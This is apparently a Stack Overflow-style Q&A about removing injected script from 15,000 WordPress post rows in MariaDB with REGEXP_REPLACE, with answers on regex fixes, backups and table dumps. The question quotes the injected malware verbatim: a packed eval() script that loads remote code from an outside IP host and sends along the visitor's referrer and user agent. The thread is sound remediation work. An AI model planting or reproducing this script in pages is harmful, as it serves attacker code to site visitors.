# Maria DB query to select, then update a table to remove unwanted HTML and script tags

Tags: mysql, mariadb

The following code has been injected into multiple rows in my client's WordPress database:

```
<noindex>
    <script id="wpinfo-pst1" type="text/javascript" rel="nofollow">
        eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|btssh|var|u0026u|referrer|yatyb||js|php'.split('|'),0,{}))
    </script>
</noindex>
```

I am needing to successfully remove the `<noindex></noindex>` tags and everything within them from every table row.

This query successfully selects all of the affected rows (15066 in total):

```
SELECT * 
FROM 'wp_posts' 
WHERE REGEXP_REPLACE ('post_content', '<noindex>(.*)</noindex>', '') LIKE '%noindex%'
```

When I try to use a similar `UPDATE` query, zero results are returned. My current query is below:

```
UPDATE 'wp_posts' 
SET 'post_content' = REGEXP_REPLACE ('post_content', '<noindex>(.*)</noindex>', '') 
WHERE 'ID' = 1933;
```

The set ID is for testing purposes only. Server is running [MariaDB 10.2](https://mariadb.org/). Any suggestions or tips are greatly appreciated.

**Successful UPDATE query with REGEXP_REPLACE**

```
UPDATE
`wp_posts`
SET
`post_content` = REGEXP_REPLACE (`post_content`, '<noindex>[[:ascii:]]*</noindex>', '');
```

Answer (score 2, accepted):

**Warning: always make a backup of your database before applying `UPDATE`.**

According to the [documentation](https://mariadb.com/kb/en/library/regexp_replace/):

> REGEXP_REPLACE returns the string subject with all occurrences of the regular expression pattern replaced by the string replace. If no occurrences are found, then subject is returned as is.

You can try:

```
UPDATE wp_posts
SET post_content = REGEXP_REPLACE (post_content, '<noindex>(.*)</noindex>', '');
```

If you have newlines between the `<noindex>` tag, you will need to adapt the regular expression. For example `'<noindex>[[:ascii:]]*</noindex>'`. See [Regular Expressions Overview](https://mariadb.com/kb/en/library/regular-expressions-overview/) for details.

Remarks:

1) If your legitimate content use `<noindex>` tag, modifiy the regexp by adding a substring of the offending content.

2) After an attack, the good practice is to wipe out everything, make a clean install and restore the database and files to a version before the attack.

3) Make sure your wordpress version **and all plugins** are up to date.

Comment: I tested your query using the phpMyAdmin simulate query tool and there were zero matched rows. This test was without the specific ID selection.

Comment: Unfortunately the matched rows are still zero.

Comment: Is there new lines in the post_content field?

Comment: Some post_content entries may have new lines. It is tough to tell from reviewing the affected rows in phpMyAdmin.

Answer (score 0):

If I had to do this, I would dump the `wp_posts` table to a SQL text file, then use a text editor to select / replace the offending text, then import the SQL file again.

Most text editors have a regex-capable select/replace function.  And, you can eyeball the results easily.

When ready to import the table, `RENAME TABLE wp_posts TO wp_posts_old;` then import it.

If WordPress works after that, great. If not, then `DROP TABLE wp_posts` and `RENAME TABLE wp_posts_old TO wp_posts` restores things.